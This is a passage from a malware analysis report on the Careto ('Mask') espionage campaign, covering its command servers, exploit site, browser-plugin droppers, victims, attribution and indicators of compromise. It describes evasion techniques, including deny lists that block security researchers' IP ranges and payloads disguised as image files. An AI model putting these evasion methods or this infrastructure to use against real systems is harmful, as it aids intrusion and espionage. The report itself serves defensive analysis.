versions. Figure 10: Sinkholed requests by version C314, the most popular ID, is used by the Careto module. C316 is the second most popular Careto module version. The \xe2\x80\x9cL\xe2\x80\x9d version of the implant is a mystery. We associate it with a version of Careto which we haven\xe2\x80\x99t been able to locate so far, perhaps the Linux variant. The C&C communication is also different from other modules. The \xe2\x80\x9cL\xe2\x80\x9d version communicates exclusively with the \xe2\x80\x9cindex.cgi\xe2\x80\x9d script. Finally, the \xe2\x80\x9cAND1.0.0.0\xe2\x80\x9d version identifier is the most interesting. The only known victim in the world running this version of the implant appears to be connecting through a 3G link, possibly indicating a mobile device. Also, there is no user agent string, as in other versions of Careto. The most likely explanation for the version name would be \xe2\x80\x9cAND(DROID)\xe2\x80\x9d, indicating a version of the implant for Google\xe2\x80\x99s Android OS. The \xe2\x80\x9cAND\xe2\x80\x9d implant communicates exclusively with the \xe2\x80\x9ccommcgi.cgi\xe2\x80\x9d. 29 TLP: GREEN 2.6. C&C Servers The backdoor modules communicates with command and control via HTTP or HTTPS, depending on the malware configuration. In all the cases we observed, the C&C expose a CGI based frontend via modules named \xe2\x80\x9cindex.cgi\xe2\x80\x9d and \xe2\x80\x9ccommcgi.cgi\xe2\x80\x9d. A list of collected C&C URLs from known modules is included below, together with server location. C&C URL Server IP, location hxxp://202.75.56.231/cgi-bin/index.cgi Malaysia, Kuala Lumpur, \xe2\x80\x9cTm Vads Dc Hosting\xe2\x80\x9d hxxp://202.75.58.153/cgi-bin/commcgi.cgi Malaysia, Kuala Lumpur, \xe2\x80\x9cTm Vads Dc Hosting\xe2\x80\x9d hxxp://cherry1962.dyndns.org/cgi-bin/index.cgi 202.75.56.231 Malaysia, Kuala Lumpur, \xe2\x80\x9cTm Vads Dc Hosting\xe2\x80\x9d hxxps://196.40.84.94/num Costa Rica, San Jose, \xe2\x80\x9cServicio Co- location Racsa\xe2\x80\x9d hxxps://202.150.214.50/cgi-bin/commcgi.cgi Singapore, \xe2\x80\x9cBenwu\xe2\x80\x9d hxxps://carrus.gotdns.com/cgi-bin/commcgi.cgi 202.75.56.123 Malaysia, Kuala Lumpur, \xe2\x80\x9cTm Vads Dc Hosting\xe2\x80\x9d hxxps://dfup.selfip.org/cgi-bin/commcgi.cgi 37.235.63.127 Austria, Graz, \xe2\x80\x9cEdis Gmbh\xe2\x80\x9d hxxps://redirserver.net/num 196.40.84.94, 190.10.9.209 Costa Rica, San Jose, \xe2\x80\x9cServicio Co- location Racsa\xe2\x80\x9d hxxps://wwnav.selfip.net/cgi-bin/commcgi.cgi 190.105.232.46 Argentina, Buenos Aires, \xe2\x80\x9cNicolas Chiarini\xe2\x80\x9d hxxps://81.0.233.15/cgi-bin/index.cgi Czech Republic, Prague, Casablanca Int hxxps://helpcenter1it6238.cz.cc/cgi- bin/commcgi.cgi 82.208.40.11 Czech Republic, Prague, Casablanca Int hxxps://helpcenter2br6932.cc/cgi- bin/commcgi.cgi n/a hxxps://223.25.232.161/cgi-bin/commcgi.cgi Singapore, \xe2\x80\x9cSg 8 To Sg\xe2\x80\x9d hxxps://oco-231-ms.xns01.com/cgi- bin/commcgi.cgi 223.25.232.161 Singapore, \xe2\x80\x9cSg 8 To Sg\xe2\x80\x9d 30 TLP: GREEN hxxps://75.126.146.114/cgi-bin/index.cgi United States, Dallas, \xe2\x80\x9cSoftlayer Technologies Inc.\xe2\x80\x9d hxxps://services.serveftp.org/cgi-bin/main.cgi 75.126.146.114 United States, Dallas, \xe2\x80\x9cSoftlayer Technologies Inc.\xe2\x80\x9d hxxps://ricush.ath.cx/cgi-bin/commcgi.cgi 75.126.146.114 United States, Dallas, \xe2\x80\x9cSoftlayer Technologies Inc.\xe2\x80\x9d hxxps://nthost.shacknet.nu/cgi-bin/index.cgi 190.105.232.46 Argentina, Buenos Aires, \xe2\x80\x9cNicolas Chiarini\xe2\x80\x9d We were able to obtain a copy of a C&C through one of our partners in Latin America, which allowed us to analyse how it works. C&C server structure A typical C&C server has the following structure: /var/www index.html < blank page /html < l nk o \xe2\x80\x9cCl en D ec o y\xe2\x80\x9d /cgi-bin /secure The /cgi-bin and /secure folders are described below. \xef\x82\xb7 CGI-BIN Folder: /cgi-bin commcgi.cgi < C&C module file.cgi < tool used by the attackers to retrieve logs index.cgi < C&C module kitkat.cgi < same file as index.cgi main.cgi < same file as index.cgi /ClientsDirectory < used to store victim\xe2\x80\x99 information /ClientsDirectory log.txt < debug logfile with victim\xe2\x80\x99 requests /dataang < empty /CmdData < empty /data < empty /fb < empty /bkp < Co ld e o fo \xe2\x80\x9c ck p\xe2\x80\x9d. Seve l small old logfiles /in < probably inbox folder for stolen files /img < encrypted files with .gif extension 31 TLP: GREEN In the case of the \xe2\x80\x9c/in\xe2\x80\x9d folder, we can find many encrypted small files with the same size (512 bytes) and the following naming schema: in.instVICTIMID.cmd000X.get000Y Apparently these files are the result of executing the command X in VICTIMID. Small packets with the same size mean that the communication is fragmented, probably Y represents the packet sequence. VICTIMID is always a 16 digit number. In the case of the /img folder, all files are encrypted data files of 929 bytes. The format is: VICTIMID.000N.gif or VICTIMID.000N.000X These are chunks of stolen data for a given VICTIMID, X being the sequence number and N the file identifier. The files in the second format don\xc2\xb4t have the same size, reinforcing the hypothesis of last file\xe2\x80\x99s chunk of data. \xef\x82\xb7 Secure Folder: /Secure getlogs.php Parses log files from apache and copies content into /usr/local/share/messages/log. Securely deletes the original log files using the \xe2\x80\x9c ed \xe2\x80\x93z\xe2\x80\x9d comm nd. module.php Allows to upload, delete and move modules into var/www/html test.php A \xe2\x80\x9cHello wo ld\xe2\x80\x9d ppl c on upload.php Uploads file into /usr/local/share/messages/authdata/auth Additionally a Perl script (launchMessages.pl) inside \xe2\x80\x9c/usr/local/share/messages\xe2\x80\x9d is used for the users to communicate between them. The script copies messages from one user to the receiver using the data in the /home/user/auth subdirectory, in the format $adfile, $login $passwd $auth $secure $port\\n. 32 TLP: GREEN Finally, we observe interesting data inside \xe2\x80\x9c.htaccess\xe2\x80\x9d files. Clearly the attackers wanted to keep their infrastructure hidden from undesired visitors. For this, they blacklisted a number of IPs used by security researchers. Some of these IPs include comments about the owners against the Careto attackers want to hide. Notably, Kaspersky Lab IPs are included in the list. /var/www/cgi-bin/.htaccess: deny from 72.52.91.30 < Hurricane Electric, Inc. deny from 217.115.10.132 < Chaos Computer Club e.V. deny from 213.61.149.100 < SOPRADO GmbH deny from 62.213.110.0/26 < Kaspersky Lab deny from 23.20.44.92 < Amazon.com deny from 38.105.71.0/24 < Cyveillance Inc deny from 66.150.14.0/24 < Internap Network Services deny from 150.70.0.0/16 < TrendMicro deny from 194.72.238.0/24 < Netcraft Ltd # evuln.com deny from 78.158.11.0/24 < evuln.com # cambridge computer laboratory deny from 128.232.0.0/16 < cambridge computer laboratory # softlayer deny from 174.36.0.0/15 < softlayer deny from 174.122.254.42 < softlayer # seguran\xc3\xa7a virtua deny from 187.122.176.14 < seguran\xc3\xa7a virtua # worldstream deny from 217.23.0.0/24 < worldstream # bluecoat deny from 8.28.16.254 < bluecoat deny from 103.246.38.0/24 < bluecoat deny from 199.19.248.0/21 < bluecoat deny from 199.91.132.0/22 < bluecoat # eset deny from 195.168.53.0/24 < eset A second .htaccess file was found in the home folder of the only user in the system. #order deny,allow Order allow,deny deny from 23.20.44.92 < Amazon EC2 deny from 38.105.71.0/24 < Cyveillance Inc deny from 66.150.14.0/24 < Internap Network Services deny from 150.70.0.0/16 < TRENDMICRO deny from 194.72.238.0/24 < Netcraft Ltd deny from 78.158.11.0/24 < evuln.com deny from 128.232.0.0/16 < cambridge computer laboratory deny from 174.36.0.0/15 < softlayer deny from 174.122.254.42 < softlayer deny from 187.122.176.14 < seguran\xc3\xa7a virtua deny from 217.23.0.0/24 < worldstream deny from 8.28.16.254 < bluecoat 33 TLP: GREEN deny from 103.246.38.0/24 < bluecoat deny from 199.19.248.0/21 < bluecoat deny from 199.91.132.0/22 < bluecoat deny from 195.168.53.0/24 < eset allow from all # Workaround for Apache Killer # http://seclists.org/fulldisclosure/2011/Aug/241 RewriteEngine On RewriteCond %{REQUEST_METHOD} ^(HEAD|GET) [NC] RewriteCond %{HTTP:Range} ([0-9]*-[0-9]*)(\\s*,\\s*[0-9]*-[0-9]*)+ [OR] RewriteCond %{HTTP:Request-Range} ([0-9]*-[0-9]*)(\\s*,\\s*[0-9]*-[0-9]*)+ RewriteRule .* - [F] These files demonstrate the attackers are carefully protecting their infrastructure and try to avoid any monitoring attempts from security companies, including Kaspersky Lab and ESET. Command and control domains registration can be accessed in APPENDIX 3. 34 TLP: GREEN 2.7. Exploits The spear phishing attacks we have observed lured the victims into URLs with resources in Spanish, such as videos related to political subjects or even food recipes (\xe2\x80\x9crecetas\xe2\x80\x9d). All the e-mails include a link to the malicious server that was used for infecting the victim. After the infection, the visitor was redirected to another, clean URL. The following links have been observed in the attacks: \xef\x82\xb7 hxxp://bit.linkconf[dot]net/jupd/w/frame-index.htm?url=hxxp://bit.ly/{censored} \xef\x82\xb7 hxxp://bit.linkconf[dot]net/jm/frame-redirect.htm?url=hxxp://bit.ly/{censored} \xef\x82\xb7 hxxp://www.recetas.linkconf[dot]net/jupd/w/frame- index.htm?url=hxxp://www.recetas.net/receta.asp?ID=1208GL The exploit pack was hosted on a server at \xe2\x80\x9clinkconf [dot] net\xe2\x80\x9d. We have found many subdomains pretending to be newspapers, perfect for the spear phishing attacks. Most of them simulate spanish newspapers: \xe2\x97\x8f negocios.iprofesional.linkconf[dot]net/ \xe2\x97\x8f www.internacional.elpais.linkconf[dot]net/ \xe2\x97\x8f politica.elpais.linkconf[dot]net/ \xe2\x97\x8f cultura.elpais.linkconf[dot]net/ \xe2\x97\x8f economia.elpais.linkconf[dot]net/ \xe2\x97\x8f test.linkconf[dot]net/ \xe2\x97\x8f soc.linkconf[dot]net/ \xe2\x97\x8f sociedad.elpais.linkconf[dot]net/ \xe2\x97\x8f world.time.linkconf[dot]net/ \xe2\x97\x8f internacional.elpais.linkconf[dot]net/ \xe2\x97\x8f elpais.linkconf[dot]net/ \xe2\x97\x8f www.elespectador.linkconf[dot]net/ \xe2\x97\x8f blogs.independent.linkconf[dot]net/ \xe2\x97\x8f www.elmundo.linkconf[dot]net/ \xe2\x97\x8f www.guardian.linkconf[dot]net/ \xe2\x97\x8f www.washingtonsblog.linkconf[dot]net/ \xe2\x97\x8f www.publico.linkconf[dot]net/ The server has the typical structure of an exploit server including Javascript code for profiling the victim (browser, plugins, operating system, MS-Office version, etc). The attack is designed to handle all possible cases and potential victim types. Depending on the operating system, browser and installed plugins, the user is redirected to different subdirectories, which contain specific exploits for the user\xe2\x80\x99s configuration that are most likely to work. 35 TLP: GREEN Unfortunately, we couldn\xe2\x80\x99t obtain any of the observed live exploits from the server as the attack URLs were removed, presumably after a successful hit on the victims. We did find however older exploits in various folder names. Overall, we have found exploits for Java, SWF (CVE-2012-0773), as well as malicious plugins for Chrome and Firefox, on Windows, Linux and OS X. The names of the subdirectories give some information about the kind of attack they launch, for instance we can find \xe2\x80\x9c/jupd\xe2\x80\x9d where \xe2\x80\x9cJavaUpdate.jar\xe2\x80\x9d downloads and executes \xe2\x80\x9cjavaupdt.exe\xe2\x80\x9d. Several attacks against browsers supporting Java have been observed. Unfortunately, we weren\xe2\x80\x99t able to retrieve all the components from these attacks, as they were no longer available on the server at the time of checking. The first known method (\xe2\x80\x9c\xe2\x80\x9d/jr/\xe2\x80\x9d folder) uses an HTML (\xe2\x80\x9cframe-index.htm\xe2\x80\x9d) file that attempts to load and run a signed applet. Figure 11: JavaUpdate.jar File name: JavaUpdate.jar MD5: da1ad4e088ba921c0420428b1f73d5ca File size: 273639 bytes The JavaUpdate.jar contains an exploit for CVE-2011-3544, a vulnerability in the Java Runtime Environment (JRE) component in Oracle JAVA SE JDK and JRE 7, 6 Update 27 and earlier. Both the Java archive and the malicious Windows payload code appears to have been compiled on Nov 7, 2013. 36 TLP: GREEN Archive: JavaUpdate.jar Name Length Method Size Ratio Date Time CRC 32 META-INF/MANIFEST.MF META-INF/ORACLE.SF META-INF/ORACLE.DSA META-INF/ META-INF/ applet.properties icon.jpg javaupdt com/ com/java/ com/java/ UpdateAbstract.class com/java/ WindowsUpdate.class com/java/ Update.class 620 782 922 0 37 278329 19784 0 0 1914 2825 1221 Defl:N Defl:N Defl:N Defl:N Defl:N Defl:N Defl:N Stored Stored Defl:N Defl:N Defl:N 400 494 774 2 36 2574 83 0 0 1079 1555 735 36% 37% 16% 0% 3% 8% 49% 0% 0% 44% 45% 40% 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 11-08-13 08:57 08:57 08:57 08:57 08:57 08:57 08:57 08:57 08:57 08:57 08:57 08:57 8ded95ba a50eb589 1adab24b 00000000 bfd6b431 fd085c57 58d365de 00000000 00000000 3e6f4e02 372c40f3 0c3ad05f The exploit\xe2\x80\x99s Windows payload: File name: javaupdt Type: Windows PE executable MD5: 302fd970cf413afe50e6a829386e6e43 File size: 19784 bytes The \xe2\x80\x9cjavaupdt\xe2\x80\x9d executable decrypts and runs the main backdoor installer from a file named \xe2\x80\x9cicon.jpg\xe2\x80\x9d in the Java archive. The installer is encrypted with a 12 bytes XOR key. Interestingly, the exploit payload is compiled with GCC, unlike other modules where the attackers used MSVC 2005. The second attack against Java users leverages Java Web Start / JNLP - Java Network Launch Protocol files. It claims to be a Java update from Oracle and asks the user to install it. The spearphished URLs reference \xe2\x80\x9chttp://linkconf[dot]net/jn/w/file.jnlp\xe2\x80\x9d. 37 TLP: GREEN Figure 12: Java Update The \xe2\x80\x9cindex.jnlp\xe2\x80\x9d has the following content: Figure 13: Index jnlp Its main function is to load \xe2\x80\x9cJavaUpdate.jar\xe2\x80\x9d, which contains a signed dropper that installs the SGH implant into the system. A Java version profiler which loads another JAR file named \xe2\x80\x9csSunJavaRealTimeSystem.jar\xe2\x80\x9d was also found on the server, in a folder named \xe2\x80\x9cm\xe2\x80\x9d that might suggest it was used for OS X visitors, considering the attacker\xe2\x80\x99s folder naming scheme. Name Length Method Size Ratio Date Time CRC 32 com/ 0 Stored 0 0% 10-07-13 16:20 00000000 com/java/ com/java/ Update.class 0 400 Stored Def1:N 0 281 0% 0% 10-07-13 10-07-13 16:20 16:20 00000000 3f8cb4bf This class simply prints a message which says \xe2\x80\x9cUpdated!\xe2\x80\x9d. 38 TLP: GREEN The other observed attack methods relies on a Flash Player exploit. CVE-2012-0773 has an interesting history. It was originally discovered by French company VUPEN and used to win the \xe2\x80\x9cpwn2own\xe2\x80\x9d contest in 2012. This was the first known exploit to escape the Chrome sandbox. VUPEN refused to share the exploit with the contest organizers, claiming that it plans to sell it to its customers. As a side node, VUPEN exploits are commonly seen in high end nation state level attacks; for instance we have commonly observed them with HackingTeam\xe2\x80\x99s DaVinci / Remote Control System attacks. Figure 14: CVE-2012-0773 staging script 39 TLP: GREEN Figure 15: Heapspray class inside the action script The SWF exploit for CVE-2012-0773 appears to have been fine-tuned for Flash Player versions 10.3.x. Although these have become obsolete (current version is 12.0.0.38), there is no point in implementing / showcasing such a complex exploit unless the attackers were leveraging it around the time it was discovered. It is also possible that the exploit was still on the server because some users still have old Flash Player versions, and for those, it\xe2\x80\x99s a perfectly good attack method. We believe \xe2\x80\x9c/m\xe2\x80\x9d subdirs are for Mac users, and the \xe2\x80\x9c/l\xe2\x80\x9d subdirs for Linux. In these we have found traces of Firefox plugins, but unfortunately they were broken. Linux plugin: Archive: af_l_addon.xpi Name Length Method Size Ratio Date Time CRC 32 chrome.manifest 183 Defl:N 101 45% 10-07-13 14:30 cc37d585 install.rdf 1274 Defl:N 443 65% 10-07-13 14:30 add50a10 bootstrap.js 1798 Defl:N 695 61% 10-07-13 14:30 52eecaba content/browser.xul 166 Defl:N 134 19% 10-07-13 14:30 74e9bad7 content/icon.png 66793 Defl:N 66664 0% 10-07-13 14:30 27609d6e plugins/sbd-linux 26020 Defl:N 22406 14% 10-07-13 14:30 a02b2e21 40 TLP: GREEN Mac / OSX plugin: Archive: af_m_addon.xpi Name Length Method Size Ratio Date Time CRC 32 chrome.manifest 183 Defl:N 102 44% 10-07-13 14:30 aeac29ae install.rdf 1274 Defl:N 443 65% 10-07-13 14:30 f5ee7026 bootstrap.js 1796 Defl:N 695 61% 10-07-13 14:30 d5fc6c9b content/browser.xul 166 Defl:N 134 19% 10-07-13 14:30 74e9bad7 content/icon.png 66793 Defl:N 66664 0% 10-07-13 14:30 27609d6e plugins/sbd-mac 42720 Defl:N 37072 13% 10-07-13 14:30 12d19684 Both attack plugins appear to have been compiled on October 7, 2013. Samples of a malicious Chrome (Win32) plugin have also been located in the \xe2\x80\x9c/ag\xe2\x80\x9d folder: File name: plugin.crx MD5: 1f40751f3db07f88c2ffe95b6a5fde86 File size: 256596 bytes The malicious Chrome plugin has the following structure: Name Length Method Size Ratio Date Time CRC 32 content/ 0 Defl:N 2 0% 00-00-80 00:00 00000000 manifest.json 305 Defl:N 165 46% 00-00-80 00:00 b500a493 plugins/ 0 Defl:N 2 0% 00-00-80 00:00 d5fc6c9b plugins/ npplugin.dll 16384 Defl:N 7358 55% 00-00-80 00:00 3bd3e8bb content/icon.jpg 266948 Defl:N 245924 8% 00-00-80 00:00 b07ab7ee content/icon.png 2184 Defl:N 2189 0% 00-00-80 00:00 276fc4e2 The plugin is loaded via Javascript from the HTML index via a file named \xe2\x80\x9cplugin.js\xe2\x80\x9d: 41 TLP: GREEN Figure 16: Loading plugin The \xe2\x80\x9cplugin.js\xe2\x80\x9d has the following content: Figure 17: Plugin.js When an unsuspecting user visits the page with Google Chrome, they get a warning indicating that \xe2\x80\x9cExtensions, Apps and Themes\xe2\x80\x9d can harm their computer: Figure 18: Chrome warning 42 TLP: GREEN The user has to choose \xe2\x80\x9cContinue\xe2\x80\x9d in order to activate the malicious plugin. The plugin installation from the exploit site works for Chrome versions prior to 21, which was released in Mid-2012. The \xe2\x80\x9cnpplugin.dll\xe2\x80\x9d acts as a loader for the main malware installer, which is encoded / obfuscated in \xe2\x80\x9ccontent/icon.jpg\xe2\x80\x9d. Its compilation timestamp is Thu Nov 07 11:00:03 2013. File name: npplugin.dll MD5: 3299415710a29ffb55e53044fc191450 File size: 16384 bytes All the exploits on the server work with multi-component artifacts, some of them disguised into \xe2\x80\x9c.jpg\xe2\x80\x9d files. Also, the communication to javascript functions is through cookies (\xe2\x80\x9cend_cookie_18a27\xe2\x80\x9d), a quite unusual method. 43 TLP: GREEN 2.8. Victims During the investigation we were able to sinkhole some of the C&C servers. All sinkholed domains have been redirected to the Kaspersky Sinkhole server. This provided detailed information regarding the location of the victims. Additionally, some of the Command and control servers maintain a debug log which includes information about the victims such as IPs and timestamps. This debug log file is stored in a folder named \xe2\x80\x9cClientsDirectory\xe2\x80\x9d and is named \xe2\x80\x9clog.txt\xe2\x80\x9d. By collecting \xe2\x80\x9clog.txt\xe2\x80\x9d files from various Careto C&C servers, it was possible to make a more detailed map of the IPs for victims of these attacks. Figure 19: Victims\xe2\x80\x99 IPs by country In total, we observed over 1,000 victims\xe2\x80\x99 IPs in 31 countries. We have also found traces of at least 380 different victim\xc2\xb4s IDs according to attackers\xc2\xb4 naming schema both in logs and sinkholed requests. The following charts correspond only to sinkholed data and ignores the historical one retrieved in log files. This data is fresher, showing the current interest of the attackers. 44 TLP: GREEN The first chart shows the geographical distribution of the victim\xc2\xb4s IDs: Figure 20: Geographical distribution by unique ID \xe2\x80\x93 sinkholed data In this case there is a clear outlier. The reason is that there is a big cluster of victims in Cuba corresponding to very few IP addresses, all belonging to the same institution. The followin chart provides the geographical location of victim\xc2\xb4s IPs instead of Ids using only sinkholed data: Figure 21: Geographical distribution by victims' IPs - sinkholed data In this chart we see the opposite effect than in the previous one, in this case with Venezuela, where few victims use multiple IPs. 45 TLP: GREEN Spain, France and Morocco are the only countries appearing in the top 5 in all cases. The main targets of Careto fall into the following categories: \xe2\x97\x8f Government institutions \xe2\x97\x8f Diplomatic / embassies \xe2\x97\x8f Energy, oil and gas companies \xe2\x97\x8f Research \xe2\x97\x8f Private equity firma \xe2\x97\x8f Activists 46 TLP: GREEN 3. Attribution Different malware components include language artifacts from the authors, suggesting they are proficient in the Spanish language. Some slang words used would be very uncommon in a non native Spanish speaker. For instance, the \xe2\x80\x9cappleupdt[dot]com\xe2\x80\x9d C&C domain has been registered by one \xe2\x80\x9cVictoria Gomez\xe2\x80\x9d from Argentina. The registration data appears fake, though. Spanish language artifacts include: \xef\x82\xb7 ""Careto - GetSystemReport v1.0"" - in the ""waiter32/64"" module \xef\x82\xb7 ""Unistalling Careto"" - in the CDlUninstallSGH32 module \xe2\x80\x9cCareto\xe2\x80\x9d is a Spanish slang word for \xe2\x80\x9cface\xe2\x80\x9d. \xef\x82\xb7 ""Caguen1aMar"" - an RC4 encryption key stored in the configuration data. Used for all communications with the command and control servers. This would be the contraction of \xe2\x80\x9cMe cago en la mar\xe2\x80\x9d, a Spanish expression meaning \xe2\x80\x9cfuck\xe2\x80\x9d. \xef\x82\xb7 ""Accept-Language: es Accept-Encoding: gzip"" - in the configuration data The authors did a number of mistakes as well. For instance, they forgot debug information in a SGHTesterCmd module which contains a path on the developer\xe2\x80\x99s machine: \xef\x82\xb7 c:\\Dev\\CaretoPruebas3.0\\release32\\CDllUninstall32.pdb \xe2\x80\x9cPruebas\xe2\x80\x9d means \xe2\x80\x9ctests\xe2\x80\x9d in Spanish. Also there are some small mistakes in some English comments: //Attempt to move the uploaded file to it's new place Unistalling Careto Uinstalling SGH In the exploiting server we have found most of the subdomains simulating newspapers from Spain. It should be noted that Spanish is spoken in 21 countries, where it is either a national language or de facto official language. We should also not exclude the possibility of a false flag operation, where the attackers intentionally planted Spanish words in order to confuse analysis. 47 TLP: GREEN 4. Conclusions With Careto, we describe yet another sophisticated cyberespionage operation that has been going on undiscovered for more than 5 years. In terms of sophisticated, we put Careto above Duqu, Gauss, RedOctober or Icefog, making it one of the most complex APT we observed. For Careto, we observed a very high degree of professionalism in the operational procedures of the group behind this attack, including monitoring of their infrastructure, shutdown of the operation, avoiding curious eyes through access rules, using wiping instead of deletion for log files and so on. This is not very common in APT operations, putting the Mask into the \xe2\x80\x9celite\xe2\x80\x9d APT groups section. The attacks rely on a combination of social engineering, for instance impersonating websites from The Guardian and Washington Post. These are coupled with at least one exploit that according to media report has been sold to governments as a 0-day by French company VUPEN. The targeting of Linux and Mac users by the attackers indicates another important trend in the world of APTs. We previously observed this and described it with Icefog; we can now say with a good degree of confidence that high end APT actors are now expanding their toolkits to include Linux and Mac \xe2\x80\x9csupport\xe2\x80\x9d. Also, there is evidence the attackers may have deployed Android and iOS backdoors as well. Unfortunately, we could not locate these samples yet nor do we know how they were implanted, especially considering iOS\xe2\x80\x99 security model. The fact that the Careto attackers appear to be speaking the Spanish language is perhaps the most unusual feature. While most of the known attacks nowadays are filled with Chinese comments, languages such as German, French or Spanish appear very rarely in APT attacks. Special thanks We would like to thank OpenDNS for providing passive DNS information on the C&C domains used by the attackers and support with sinkholing. 48 TLP: GREEN APPENDIX 1: Indicators of compromise Filenames: %system%\\objframe.dll %system%\\shlink32.dll %system%\\shlink64.dll cdllait32.dll cdllait64.dll cdlluninstallws32.dll cdlluninstallws64.dll cdlluninstallsgh32.dll cdlluninstallsgh64.dll %system%\\c_50225.nls %system%\\c_50227.nls %system%\\c_50229.nls %system%\\c_51932.nls %system%\\c_51936.nls %system%\\c_51949.nls %system%\\c_51950.nls %system%\\c_57002.nls %system%\\c_57006.nls %system%\\c_57008.nls %system%\\c_57010.nls %system%\\cdgext32.dll %system%\\cfgbkmgrs.dll %system%\\cfgmgr64.dll %system%\\comsvrpcs.dll %system%\\d3dx8_20.dll %system%\\dllcomm.dll %system%\\drivers\\wmimgr.sys %system%\\drvinfo.bin %system%\\FCache.bin %system%\\FFExtendedCommand.dll %system%\\gpktcsp32.dll %system%\\HPQueue.bin %system%\\LPQueue.bin %system%\\mdwmnsp.dll %system%\\rpcdist.dll %system%\\scsvrft.dll %system%\\sdptbw.dll %system%\\slbkbw.dll %system%\\skypeie6plugin.dll %system%\\wmspdmgr.dll %temp%\\~DF01AC74D8BE15EE01.tmp %temp%\\~DF23BF45A473C42B56.tmp %temp%\\~DFA0528CD81300F372.tmp %temp%\\~DF8471938479DA49221.tmp 49 TLP: GREEN %appdata%\\microsoft\\c_27803.nls %appdata%\\microsoft\\objframe.dll %appdata%\\microsoft\\shmgr.dll Registry keys: [HKLM\\Software\\Classes\\CLSID\\{E6BB64BE-0618-4353-9193- 0AFE606D6F0C}\\InprocServer32] C&C and exploit staging server IPs: 190.10.9.209 190.105.232.46 196.40.84.94 200.122.160.25 202.150.211.102 202.150.214.50 202.75.56.123 202.75.56.231 202.75.58.153 210.48.153.236 223.25.232.161 37.235.63.127 75.126.146.114 81.0.233.15 82.208.40.11 62.149.227.3 75.126.146.114 Domains and hostnames: nthost.shacknet.nu tunga.homedns.org prosoccer1.dyndns.info prosoccer2.dyndns.info nav1002.ath.cx pininfarina.dynalias.com wqq.dyndns.org pl400.dyndns.org services.serveftp.org sv.serveftp.org cherry1962.dyndns.org carrus.gotdns.com ricush.ath.cx takami.podzone.net dfup.selfip.org wwnav.selfip.net fast8.homeftp.org 50 TLP: GREEN ctronlinenews.dyndns.tv mango66.dyndns.org gx5639.dyndns.tv services.serveftp.org *.redirserver.net *.swupdt.com *.msupdt.com *.appleupdt.com *.linkconf.net 51 TLP: GREEN APPENDIX 2: SGH Modules \xe2\x80\x93 detailed analysis i) The \xe2\x80\x9cScsimap\xe2\x80\x9d driver This driver is started by the system automatically as a service. It is responsible for loading the rest of the malware's components and providing communication facilities between them. It acts as a framework that glues together all the parts of the malware. File type: Win32 driver Compilation timestamp: 2013.04.09 14:15:03 (GMT) File size: 14464 bytes Technical details The file was compiled using Microsoft Visual Studio 2003. The driver exports three functions that provide the API for the malware's kernel-mode components: 0001086C: IopQueryInterface 00010840: IopRegisterInterface 00010888: IopSetDeviceStatusChange Creates a device: \\Device\\{E07DB02C-387E-43b2-A6F2-C59B4934B7D6} Also creates a symbolic link to this device: \\DosDevices\\{E07DB02C-387E-43b2- A6F2-C59B4934B7D6} The \xe2\x80\x9cScsimap\xe2\x80\x9d driver loads other modules from \xe2\x80\x9c\\SystemRoot\\System32\\bootfont.bin\xe2\x80\x9d, which is an encrypted virtual file system. It decrypts it on the fly using RC4 and loads and executes all the additional modules which are present in that file. The module receives commands via DeviceIoControl function. It can be commanded to load a binary from the \xe2\x80\x9cbootfont.bin\xe2\x80\x9d file, to write a new \xe2\x80\x9cbootfont.bin\xe2\x80\x9d configuration, to return the contents of that file and overwrite its contents. A typical \xe2\x80\x9cbootfont.bin\xe2\x80\x9d virtual file system contains the following driver modules: Module config, 8272 bytes Module storage, 12240 bytes Module cipher, 7248 bytes Module cmprss, 2640 bytes Module loaddll, 14032 bytes Module PGPsdkDriver, 7504 bytes Module fileflt, 32080 bytes Module stopsec, 2768 bytes Module TdiFlt, 17616 bytes Module TdiFlt2, 18512 bytes 52 TLP: GREEN The modules interact with each other by exporting and importing function pointers. Each function is identified by a numeric value. The module that provides the function first calls the function \xe2\x80\x9cIopRegisterInterface\xe2\x80\x9d exported by \xe2\x80\x9cscsimap\xe2\x80\x9d, and the consumer function can request the function pointer by calling the function IopQueryInterface with a proper function number. ii) Config module This modules operates the SGH's unified configuration data that is used by all other components. Exports the following functions: 0x00 ReadConfig 0x01 WriteConfig The data is stored in the registry key: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\scsimap\\Params, Value The configuration block is encrypted with a hardcoded key using the RC4 algorithm. iii) Storage module This module maintains two storage files: \\SystemRoot\\System32\\c_50229.nls \\SystemRoot\\System32\\c_50227.nls The module receives information collected by other modules and stores them in a system activity log. Entries in the activity log are prepended with timestamps and text labels (see below). These label correspond to internal and system events, i.e. writing collected information to a file, starting a new process, etc. Exported functions: 0x08 Store a log entry with a label \xe2\x80\x9cGET\xe2\x80\x9d 0x09 Store a log entry with a label \xe2\x80\x9cDEL\xe2\x80\x9d 0x0A Store a log entry with a label \xe2\x80\x9cPUT\xe2\x80\x9d (new data collected) 0x0B Create an additional activity log file \\SystemRoot\\System32\\~{7 hex digits}.tmp 0x0C Not implemented 53 TLP: GREEN 0x0D Not implemented 0x0E Not implemented 0x0F Not implemented 0x15 Get internal storage state 0x16 Get internal storage state 0x18 Get internal storage state 0x19 Store a log entry with a label \xe2\x80\x9cPURGE\xe2\x80\x9d 0x1F Store a log entry with a label \xe2\x80\x9cSTART\xe2\x80\x9d (system startup) 0x20 Store a log entry with a label \xe2\x80\x9cSTOP\xe2\x80\x9d (system shutdown) iv) Storage module This module maintains two storage files: \\SystemRoot\\System32\\c_50229.nls \\SystemRoot\\System32\\c_50227.nls The module receives information collected by other modules and stores them in a system activity log. Entries in the activity log are prepended with timestamps and text labels (see below). These label correspond to internal and system events, i.e. writing collected information to a file, starting a new process, etc. Exported functions: 0x08 Store a log entry with a label \xe2\x80\x9cGET\xe2\x80\x9d 0x09 Store a log entry with a label \xe2\x80\x9cDEL\xe2\x80\x9d 0x0A Store a log entry with a label \xe2\x80\x9cPUT\xe2\x80\x9d (new data collected) 0x0B Create an additional activity log file \\SystemRoot\\System32\\~{7 hex digits}.tmp 0x0C Not implemented 0x0D Not implemented 0x0E Not implemented 0x0F Not implemented 0x15 Get internal storage state 0x16 Get internal storage state 0x18 Get internal storage state 0x19 Store a log entry with a label \xe2\x80\x9cPURGE\xe2\x80\x9d 0x1F Store a log entry with a label \xe2\x80\x9cSTART\xe2\x80\x9d (system startup) 0x20 Store a log entry with a label \xe2\x80\x9cSTOP\xe2\x80\x9d (system shutdown) 54 TLP: GREEN 